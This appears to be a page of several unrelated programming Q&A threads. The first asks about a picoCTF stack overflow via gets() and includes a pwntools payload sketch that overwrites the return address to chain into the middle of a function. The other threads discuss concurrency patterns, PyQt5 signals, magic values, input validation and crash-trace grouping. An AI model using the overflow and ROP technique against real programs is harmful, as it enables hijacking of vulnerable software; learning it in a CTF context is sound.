Jumping to an address inside a function - security

While trying to solve a challenge from a past CTF event, I came across a unique problem that required me to do the following:
Use the vulnerable function "gets()" to overwrite the return address of the vulnerable function with the address of a second function, and the stack cell above it with the address of another function that prints the flag, creating a small ROP chain.
The overflow had to be done in such a way that a global boolean variable in the second function would pass the following condition: if(a && !a){; and then proceed safely to the last function.
This is obviously impossible; no boolean should be true and false at the same time. But if you look at the compiled assembly, the condition is separated into two different checks, one that tests whether it is true and one that tests whether it is false, so the only option is to jump in between the two checks, taking into consideration that the default value of the boolean is false.
Overflowing to that middle address results in immediate termination of the program. Taking into consideration that jumping to another function is required after landing in the middle of the second one, it seems like the mid-function jump disturbs something in the leave and ret instructions.
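For concreteness, here is a minimal sketch of that payload layout in Python with pwntools; the binary name, the offset, and both addresses are hypothetical placeholders, not values from the actual challenge.

from pwn import p32, process

OFFSET = 28                        # hypothetical distance from the buffer to the saved return address
MID_OF_SECOND_FUNC = 0x080485a6    # hypothetical address between the two boolean checks
FLAG_FUNC = 0x080485f0             # hypothetical address of the flag-printing function

payload = b'A' * OFFSET
payload += p32(MID_OF_SECOND_FUNC)   # overwrites the saved return address
payload += p32(FLAG_FUNC)            # the stack cell above it: where the second function "returns" to

p = process('./vuln')                # hypothetical binary name
p.sendline(payload)
print(p.recvall().decode())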
My question is:
Is it possible to jump into the middle of a function without disturbing the "folding" of the function and causing an error? If not, why? And if yes, what is needed to do so?
with respect,
revolution
BTW: ASLR is active, the program is written in C, the OS is 32-bit Ubuntu, and the challenge is from picoCTF 2019. This question is a general one that came as an inspiration from a challenge in the event, so write-ups are not the answer in this case.


Is there a (pattern?) name for this kind of concurrent computation?

I am looking for the name and info on a pattern (?) that I'm contemplating. As I don't know the name, it's difficult to search for it.
Here's what I'm trying to do, with a totally hypothetical example...
find-flight(trip-details, 'cheapest') :: flight
I have this public function, find-flight(...), that accepts 2 parameters, trip-details and some instruction to apply. It returns a single flight, not a list of them.
When I call it with 'cheapest', the function will wait for all available flight results to come in from Expedia, Travelocity, Hotwire, etc., to ensure the cheapest flight is found.
When I call it with 'shortest-flight', the function would do the same kind of underlying work as 'cheapest' but would return the shortest flight. I'm sure you can come up with other instructions to apply.
BUT! I'm specifically interested in a variant of this: the instruction (implied or not) would be 'I-am-filthy-rich-and-I-want-to-buy-a-ticket-now'. In other words, the function would call all the sources such as Expedia, Orbitz, etc., but would return the very first internally received result, at any price point.
I'm asking because I want my public function to be as quick as possible. I can think of a number of strategies that would make it respond fast, but I'm not sure which approach would be best, considering that the instruction parameter is unknown until the function is called.
So I'm thinking about writing various versions of this function that would all be called by the public version. It'd return the first result. Then, the other strategies could optionally be aborted. If I did that, I could get some metrics on the function and further optimize.
If I were to write this in Java, I'd have a bunch of future objects that the function would loop through to see which one is done first. I'd return that one.
What's that called?
It's been proposed that the pattern is called Promise Race.
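As an illustration, here is a minimal sketch of that race in Python's asyncio; the provider coroutines are hypothetical stand-ins for the Expedia/Travelocity calls.

import asyncio

async def fetch_expedia(trip):        # hypothetical provider call
    await asyncio.sleep(0.3)          # simulated network latency
    return ('expedia', 120)

async def fetch_travelocity(trip):    # hypothetical provider call
    await asyncio.sleep(0.1)
    return ('travelocity', 150)

async def find_flight_now(trip):
    # Race all providers and return whichever finishes first, cancelling the rest.
    tasks = [asyncio.create_task(f(trip)) for f in (fetch_expedia, fetch_travelocity)]
    done, pending = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
    for task in pending:
        task.cancel()
    return done.pop().result()

print(asyncio.run(find_flight_now('NYC-LAX')))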

How to pass arguments to QTableWidget table cell signals in PyQt5 (PySide2)? [duplicate]

According to the API, the cell-oriented signals of a PyQt5 or PySide2 QTableWidget are supposed to receive two integer parameters, for row and column respectively. For example:
def cellClicked (row, column)
Now, when I try to call them like that:
table = QTableWidget(5, 5)

def slotCellClick1():
    print('something')

table.cellClicked(0, 0).connect(slotCellClick1)
I get: TypeError: native Qt signal is not callable.
The solution that works, and that is so far described in examples, is in this manner:
table.cellClicked.connect(slotCellClick1)
which works for cell click, in general.
Am I getting the concept wrong, or is there still a way to address a specific cell's signals with these API functions? Otherwise, what would be the workaround to trigger cell-specific click signals?
That's not how signals and slots work.
Toolkits, and APIs in general, use callbacks to notify the programmer when something happens, by calling a function to react to it; this approach usually provides an interface that can pass some arguments along with the notification.
Suppose you have a module that at a certain point can change "something" in it; you want to be notified whenever that change happens and eventually do something with it:
# pseudo code
from some_api import some_object
def some_function(argument):
    print("Something changed to {}!".format(argument))
some_object.set_something_changed_callback(some_function)
>>> some_object.change_something(True)
Something changed to True!
As you can see, the something_changed_callback is not about the possible value of "something", as the callback will be called anyway; if you want to react to a specific value of "something", you'll have to check that within the callback function.
While for simpler APIs it's usually fine to have a set_*_changed_callback() for each possible case, in complex toolkits like Qt that would be unwieldy (adding thousands of functions, one for each signal) and confusing.
Qt (like other toolkits, such as Gtk) uses a similar callback technique but with a unified interface to connect all signals to their "callbacks"; the concept doesn't change that much, at least from the coding perspective, but it makes things easier.
Originally, the syntax was like this:
QObject.connect(some_object, SIGNAL("something_changed(bool)"), some_function)
but for some years now it's been simplified to the "new style" connection:
some_object.something_changed.connect(some_function)
which is almost the same as the above:
some_object.set_something_changed_callback(some_function)
So, long story short, you can't connect to a specific signal "result", you'll have to check it by yourself.
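Applied to the question's table, a minimal runnable sketch (PyQt5; the (0, 0) check is the cell-specific behavior being asked about, moved into the slot):

import sys
from PyQt5.QtWidgets import QApplication, QTableWidget

app = QApplication(sys.argv)
table = QTableWidget(5, 5)

def on_cell_clicked(row, column):
    # The signal fires for every cell; the value check lives in the slot.
    if row == 0 and column == 0:
        print('something')

table.cellClicked.connect(on_cell_clicked)
table.show()
sys.exit(app.exec_())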
I can understand your point of view: «I'm interested in calling my slot only when the value is x/y/z». It would make sense, but that kind of interface could be problematic from the API implementation point of view.
Most importantly, a lot of signals emit objects that are class instances (QModelIndex, QStandardItem, etc.) that are created at runtime, or even have parents that don't exist yet when you have to connect them, or are mutable objects (one might want to check if a list or dictionary is equal to the one emitted, or if it is the same object).
Also, some signals have multiple arguments, and one could be interested in checking only some or one of them, but that kind of checking would be almost impossible to create with a simple function argument without any possibility of error or exception. Let's say you want to connect to cellClicked whenever the column is 1, no matter what row; you'd probably think that a good way would be to use cellClicked(None, 1), cellClicked(False, 1) or cellClicked(-1, 1), but some signals actually return None, False or -1, so there wouldn't be a simple standardized way to tell "ignore that argument" (if not by using a custom type).
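Continuing the sketch above: for the "column 1, any row" case, the check can at least be moved to the connection site with a small lambda wrapper (it's still a check in your own code, not in the signal):

table.cellClicked.connect(
    lambda row, column: print('column 1 clicked, row', row) if column == 1 else None)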
After searching, I found an answer that addresses my question for the specific case of cellDoubleClicked: https://stackoverflow.com/a/46738897/3597222

Misuse of a variable's value?

I came across an instance where the solution to a particular problem was to use a variable whose value, when zero or above, meant the system would use that value in a calculation, but when less than zero indicated that the value should not be used at all.
My initial thought was that I didn't like the multipurpose use of the variable's value: a) as a value to be used in a formula; b) as a form of control logic.
What is this kind of misuse of a variable called? Meta-'something' or is there a classic antipattern that this fits?
Sort of feels like when a database field is set to null to represent not using a value and if it's not null then use the value in that field.
Update:
An example: if a variable's value is > 0, I use the value; if it's <= 0, I don't use it and instead perform some other logic.
Values such as these are often called "distinguished values". By far the most common distinguished value is null for reference types. A close second is the use of distinguished values to indicate unusual conditions (e.g. error return codes or search failures).
The problem with distinguished values is that all client code must be aware of the existence of such values and their associated semantics. In practical terms, this usually means that some kind of conditional logic must be wrapped around each call site that obtains such a value. It is far too easy to forget to add that logic, obtaining incorrect results. It also promotes copy-and-paste code as the boilerplate code required to deal with the distinguished values is often very similar throughout the application but difficult to encapsulate.
Common alternatives to the use of distinguished values are exceptions, or distinctly typed values that cannot be accidentally confused with one another (e.g. Maybe or Option types).
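For example, a minimal sketch in Python of the Option-type alternative; the function and its data are purely illustrative.

from typing import Optional

def find_discount(code: str) -> Optional[float]:
    discounts = {'SAVE10': 0.10, 'SAVE20': 0.20}
    # None means "no value here", instead of a magic -1 the caller must remember.
    return discounts.get(code)

discount = find_discount('SAVE10')
if discount is not None:
    print('Applying discount: {:.0%}'.format(discount))
else:
    print('No discount to apply')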
Having said all that, distinguished values may still play a valuable role in environments with extremely tight memory availability or other stringent performance constraints.
I don't think what you're describing is a pure magic number, but it's kind of close. It's similar to the situation in pre-.NET 2.0 code where you'd use Int32.MinValue to indicate a null value. .NET 2.0 introduced Nullable<T> and largely alleviated this issue.
So you're describing the use of a variable whose value really means something other than its value: -1 means essentially the same thing as Int32.MinValue in the example above.
I'd call it a magic number.
Hope this helps.
Using different ranges of the possible values of a variable to invoke different functionality was very common when RAM and disk space for data and program code were scarce. Nowadays, you would use a function or an additional, accompanying value (boolean, or enumeration) to determine the action to take.
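As a hedged sketch of that modern alternative in Python (all names are illustrative):

from dataclasses import dataclass

@dataclass
class Adjustment:
    value: float
    enabled: bool  # the control logic lives here, not in the sign of value

def apply_adjustment(base: float, adj: Adjustment) -> float:
    # Decide from the accompanying flag, not from a distinguished range of value.
    return base + adj.value if adj.enabled else base

print(apply_adjustment(100.0, Adjustment(5.0, True)))   # 105.0
print(apply_adjustment(100.0, Adjustment(5.0, False)))  # 100.0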
Current OSes suggest 1 GiB of RAM to operate correctly, when 256 KiB was considered a lot only a few years ago. Cheap disk space has gone from hundreds of MiB to multiples of TiB in a matter of months. Not too long ago I wrote programs for 640 KiB of RAM and 10 MiB of disk, and you would probably hate them.
I think it's reasonable to tolerate code like that if it's more than a few years old (refactor it!), but to denounce it as bad practice if it's recent.

Programming style question on how to code functions

So, I was just coding a bit today, and I realized that I don't have much consistency when it comes to coding style for functions. One of my main concerns is whether it's proper to check that the user's input is valid OUTSIDE of the function, or to just pass the user's values into the function and check their validity in there. Let me sketch an example:
I have a function that lists hosts based on an environment, and I want to be able to split the environment into chunks of hosts. So an example of the usage is this:
listhosts -e testenv -s 2 1
This will get all the hosts from "testenv", split them into two parts, and display part one.
In my code, I have a function that you pass a list, and it returns a list of lists based on your splitting parameters. BUT, before I pass it a list, I first verify the parameters in my MAIN during the getopts processing: in the main I check that the user passed no negatives, and that the user didn't request to split into, say, 4 parts while asking to display part 5 (which would not be valid), etc.
tl;dr: Would you check the validity of a user's input in the flow of your MAIN, or would you do the check in the function itself, either returning a valid response for valid input or returning NULL for invalid input?
Obviously both methods work; I'm just interested to hear from experts as to which approach is better :) Thanks for any comments and suggestions you guys have! FYI, my example is coded in Python, but I'm still more interested in a general programming answer as opposed to a language-specific one!
Good question! My main advice is that you approach the problem systematically. If you are designing a function f, here is how I think about its specification:
What are the absolute requirements that a caller of f must meet? Those requirements are f's precondition.
What does f do for its caller? When f returns, what is the return value and what is the state of the machine? Under what circumstances does f throw an exception, and what exception is thrown? The answers to all these questions constitute f's postcondition.
The precondition and postcondition together constitute f's contract with callers.
Only a caller meeting the precondition gets to rely on the postcondition.
Finally, bearing directly on your question, what happens if f's caller doesn't meet the precondition? You have two choices:
You guarantee to halt the program, one hopes with an informative message. This is a checked run-time error.
Anything goes. Maybe there's a segfault, maybe memory is corrupted, maybe f silently returns a wrong answer. This is an unchecked run-time error.
Notice some items not on this list: raising an exception or returning an error code. If these behaviors are to be relied upon, they become part of f's contract.
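To make the two choices concrete, here is a small illustrative sketch (the functions are hypothetical, not from the question):

def divide_checked(a, b):
    # Choice 1: checked run-time error; the program halts with an informative message.
    assert b != 0, 'divide_checked: precondition violated (b == 0)'
    return a / b

def divide_unchecked(a, b):
    # Choice 2: unchecked run-time error; anything goes, here a silently wrong answer.
    return a / b if b != 0 else 0.0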
Now I can rephrase your question:
What should a function do when its caller violates its contract?
In most kinds of applications, the function should halt the program with a checked run-time error. If the program is part of an application that needs to be reliable, either the application should provide an external mechanism for restarting an application that halts with a checked run-time error (common in Erlang code), or if restarting is difficult, all functions' contracts should be made very permissive so that "bad input" still meets the contract but promises always to raise an exception.
In every program, unchecked run-time errors should be rare. An unchecked run-time error is typically justified only on performance grounds, and even then only when code is performance-critical. Another source of unchecked run-time errors is programming in unsafe languages; for example, in C, there's no way to check whether memory pointed to has actually been initialized.
Another aspect of your question is
What kinds of contracts make the best designs?
The answer to this question varies more depending on the problem domain.
Because none of the work I do has to be high-availability or safety-critical, I use restrictive contracts and lots of checked run-time errors (typically assertion failures). When you are designing the interfaces and contracts of a big system, it is much easier if you keep the contracts simple, you keep the preconditions restrictive (tight), and you rely on checked run-time errors when arguments are "bad".
I have a function that you pass a list, and it returns a list of lists based on your splitting parameters. BUT, before I pass it a list, I first verify the parameters in my MAIN during the getopts processing: in the main I check that the user passed no negatives, and that the user didn't request to split into, say, 4 parts while asking to display part 5.
I think this is exactly the right way to solve this particular problem:
Your contract with the user is that the user can say anything, and if the user utters a nonsensical request, your program won't fall over; it will issue a sensible error message and then continue.
Your internal contract with your request-processing function is that you will pass it only sensible requests.
You therefore have a third function, outside the second, whose job it is to distinguish sense from nonsense and act accordingly: your request-processing function gets "sense", the user is told about "nonsense", and all contracts are met.
One of my main concerns is whether it's proper to check that the user's input is valid OUTSIDE of the function.
Yes. Almost always this is the best design. In fact, there's probably a design pattern somewhere with a fancy name. But if not, experienced programmers have seen this over and over again. One of two things happens:
parse / validate / reject with error message
parse / validate / process
This kind of design has one data type (request) and four functions. Since I'm writing tons of Haskell code this week, I'll give an example in Haskell:
data Request -- type of a request
parse :: UserInput -> Request -- has a somewhat permissive precondition
validate :: Request -> Maybe ErrorMessage -- has a very permissive precondition
process :: Request -> Result -- has a very restrictive precondition
Of course there are many other ways to do it. Failures could be detected at the parsing stage as well as the validation stage. "Valid request" could actually be represented by a different type than "unvalidated request". And so on.
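A rough Python rendering of the same split, with illustrative types and rules loosely based on the listhosts example:

from typing import Optional

def parse(argv: list) -> dict:
    # Somewhat permissive precondition: shapes raw input into a request.
    return {'env': argv[0], 'parts': int(argv[1]), 'index': int(argv[2])}

def validate(request: dict) -> Optional[str]:
    # Very permissive precondition: returns an error message, or None if sensible.
    if request['parts'] <= 0:
        return 'number of parts must be positive'
    if not 1 <= request['index'] <= request['parts']:
        return 'requested part is out of range'
    return None

def process(request: dict) -> str:
    # Very restrictive precondition: assumes validate() returned None.
    return 'showing part {index} of {parts} for {env}'.format(**request)

request = parse(['testenv', '2', '1'])
error = validate(request)
print(error or process(request))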
I'd do the check inside the function itself to make sure that the parameters I was expecting were indeed what I got.
Call it "defensive programming" or "programming by contract" or "assert checking parameters" or "encapsulation", but the idea is that the function should be responsible for checking its own pre- and post-conditions and making sure that no invariants are violated.
If you do it outside the function, you leave yourself open to the possibility that a client won't perform the checks. A method should not rely on others knowing how to use it properly.
If the contract fails you either throw an exception, if your language supports them, or return an error code of some kind.
Checking within the function adds complexity, so my personal policy is to do sanity checking as far up the stack as possible, and catch exceptions as they arise. I also make sure that my functions are documented so that other programmers know what the function expects of them. They may not always follow such expectations, but to be blunt, it is not my job to make their programs work.
It often makes sense to check the input in both places.
In the function you should validate the inputs and throw an exception if they are incorrect. This prevents invalid inputs causing the function to get halfway through and then throw an unexpected exception like "array index out of bounds" or similar. This will make debugging errors much simpler.
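A hedged sketch of that in-function validation (the splitter and its rules are illustrative, modeled on the question):

def split_hosts(hosts, parts, index):
    # Validate first, so bad inputs fail fast with a clear message
    # rather than as an "index out of bounds" somewhere deeper.
    if parts <= 0:
        raise ValueError('parts must be positive, got {}'.format(parts))
    if not 1 <= index <= parts:
        raise ValueError('index {} out of range for {} parts'.format(index, parts))
    size = -(-len(hosts) // parts)  # ceiling division
    return hosts[(index - 1) * size : index * size]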
However throwing exceptions shouldn't be used as flow control and you wouldn't want to throw the raw exception straight to the user, so I would also add logic in the user interface to make sure I never call the function with invalid inputs. In your case this would be displaying a message on the console, but in other cases it might be showing a validation error in a GUI, possibly as you are typing.
"Code Complete" suggests an isolation strategy where one could draw a line between classes that validate all input and classes that treat their input as already validated. Anything allowed to pass the validation line is considered safe and can be passed to functions that don't do validation (they use asserts instead, so that errors in the external validation code can manifest themselves).
How to handle errors depends on the programming language; however, when writing a commandline application, the commandline really should validate that the input is reasonable. If the input is not reasonable, the appropriate behavior is to print a "Usage" message with an explanation of the requirements as well as to exit with a non-zero status code so that other programs know it failed (by testing the exit code).
Silent failure is the worst kind of failure, and that is what happens if you simply return incorrect results when given invalid arguments. If the failure is ever caught, then it will most likely be discovered very far away from the true point of failure (passing the invalid argument). Therefore, it is best, IMHO to throw an exception (or, where not possible, to return an error status code) when an argument is invalid, since it flags the error as soon as it occurs, making it much easier to identify and correct the true cause of failure.
I should also add that it is very important to be consistent in how you handle invalid inputs: you should either check and throw an exception on invalid input for all functions, or do that for none of them, since if users of your interface discover that some functions throw on invalid input, they will begin to rely on this behavior and will be incredibly surprised when other functions simply return invalid results rather than complaining.

Is the valid state domain of a program a regular language?

If you look at the call stack of a program and treat each return pointer as a token, what kind of automaton is needed to build a recognizer for the valid states of the program?
As a corollary, what kind of automaton is needed to build a recognizer for a specific bug state?
(Note: I'm only looking at the info that could be had from this function.)
My thought is that if these form regular languages, then some interesting tools could be built around that. E.g., given a set of crash/failure dumps, automatically group them and generate a recognizer to identify new instances of known bugs.
Note: I'm not suggesting this as a diagnostic tool but as a data management tool for turning a pile of crash reports into something more useful.
"These 54 crashes seem related, as do those 42."
"These new crashes seem unrelated to anything before date X."
etc.
It would seem that I've not been clear about what I'm thinking of accomplishing, so here's an example:
Say you have a program that has three bugs in it.
Two bugs that cause invalid args to be passed to a single function, tripping the same sanity check.
A function that, if given a (valid) corner case, goes into infinite recursion.
Also assume that when the program crashes (failed assert, uncaught exception, seg-V, stack overflow, etc.) it grabs a stack trace, extracts the call sites from it, and ships them to a QA reporting server. (I'm assuming that only that information is extracted because 1) it's easy to get with a one-time per-project cost, and 2) it has a simple, definite meaning that can be used without any special knowledge about the program.)
What I'm proposing would be a tool that would attempt to classify incoming reports as connected to one of the known bugs (or as a new bug).
The simplest thing would be to assume that one failure site is one bug, but in the first example, two bugs get detected in the same place. The next easiest thing would be to require the entire stack to match, but again, this doesn't work in cases like the second example, where you have multiple pieces of valid code that can trip the same bug.
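As a sketch of the kind of tool being proposed, here is a toy Python grouper keyed on a prefix of the call sites; the depth-3 key is an arbitrary heuristic, not a claim about the right classifier.

from collections import defaultdict

def bucket_key(call_sites, depth=3):
    # Key on the innermost frames; crude, since one site can hide two bugs
    # and several different stacks can trip the same bug.
    return tuple(call_sites[:depth])

def group_reports(reports):
    groups = defaultdict(list)
    for report_id, call_sites in reports:
        groups[bucket_key(call_sites)].append(report_id)
    return groups

reports = [
    (1, ['check_args', 'parse_header', 'main']),
    (2, ['check_args', 'parse_body', 'main']),
    (3, ['recurse', 'recurse', 'recurse']),
]
for key, ids in group_reports(reports).items():
    print(key, '->', ids)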
The return pointer on the stack is just a pointer to memory. In theory, if you look at the call stack of a program that makes just one function call, the return pointer (for that one function) can have a different value for every execution of the program. How would you analyze that?
In theory you could read through a core dump using a map file. But doing so is extremely platform and compiler specific. You would not be able to create a general tool for doing this with any program. Read your compiler's documentation to see if it includes any tools for doing postmortem analysis.
If your program is decorated with assert statements, then each assert statement defines a valid state. The program statements between the assertions define the valid state changes.
A program that crashes has violated enough assertions that something broke.
A program that's incorrect but "flaky" has violated at least one assertion but hasn't failed.
It's not at all clear what you're looking for. The valid states are -- sometimes -- hard to define but -- usually -- easy to represent as simple assert statements.
Since a crashed program has violated one or more assertions, a program with explicit, executable assertions doesn't need crash debugging. It will simply fail an assert statement and die visibly.
If you don't want to put in assert statements then it's essentially impossible to know what state should have been true and which (never-actually-stated) assertion was violated.
Unwinding the call stack to work out the position and the nesting is trivial. But it's not clear what that shows. It tells you what broke, but not what other things led to the breakage. That would require guessing which assertions were supposed to have been true, which requires deep knowledge of the design.
Edit.
"seem related" and "seem unrelated" are undefinable without recourse to the actual design of the actual application and the actual assertions that should be true in each stack frame.
If you don't know the assertions that should be true, all you have is a random puddle of variables. What can you claim about "related" given a random pile of values?
Crash 1: a = 2, b = 3, c = 4
Crash 2: a = 3, b = 4, c = 5
Related? Unrelated? How can you classify these without knowing everything about the code? If you know everything about the code, you can formulate standard assert-statement conditions that should have been true. And then you know what the actual crash is.
